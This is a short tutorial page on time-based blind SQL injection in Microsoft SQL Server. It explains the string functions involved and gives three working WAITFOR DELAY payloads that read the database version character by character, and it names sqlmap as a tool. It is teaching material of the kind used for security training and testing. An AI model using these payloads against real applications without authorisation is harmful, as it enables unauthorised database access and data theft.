MSSQL Blind

Context

This article aims to teach the exploitation of MSSQL Blind SQL Injection for data extraction. It assumes that the reader has an intermediate understanding of SQL query structures and the HTTP request/response cycle.

Theory

Blind SQL Injection in MSSQL

Blind SQL Injection is a technique where attackers can infer data from a database without receiving direct output. This attack is possible due to the way web applications process SQL queries without displaying error messages or results directly from the database. Instead, attackers use conditional responses or timing delays to extract information.

Function Usage in Blind SQL Injection

Blind SQL Injection relies heavily on specific MSSQL functions to infer data:

  • substring(): This function extracts a part of a string, essential for determining parts of data like a database version.

  • ascii(): It returns the ASCII value of a character. By comparing character values, the attacker can infer data character by character.

  • charindex(): This function finds the position of a substring in a string, useful for positional inference.

  • left(): Retrieves the leftmost part of a string, assisting in narrowing down data extraction.

  • right(): Similar to left(), but retrieves the rightmost part of the string; both help in extracting specific data.

Data Extraction Mechanisms

Blind SQL Injections extract data using conditional logic to evaluate true or false conditions. This methodology hinges on protocol weaknesses, such as response times or changes in page content based on the executed query. For example, an injected payload might cause the server to delay its response if a condition is true, thus indirectly revealing data.

Practice

Blind SQL Injection Data Extraction

Execute these steps to extract data via Blind SQL Injection in MSSQL:

  1. Determine if the first character of @@version is 'M' (ASCII 77):

    SELECT CASE WHEN (SELECT ASCII(SUBSTRING(@@version,1,1)))=77 THEN WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0' END
    • If the server delays its response by 5 seconds, the character is confirmed as 'M'.

  2. Determine if the second character of @@version is 'i' (ASCII 105):

    SELECT CASE WHEN (SELECT ASCII(SUBSTRING(@@version,2,1)))=105 THEN WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0' END
    • A delayed response confirms the character as 'i'.

  3. Determine if the third character of @@version is 'c' (ASCII 99):

    SELECT CASE WHEN (SELECT ASCII(SUBSTRING(@@version,3,1)))=99 THEN WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0' END
    • A 5-second delay means the character is 'c'.

By using these methods sequentially, attackers can extract database version information or other sensitive data.

Tools

  • sqlmap

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.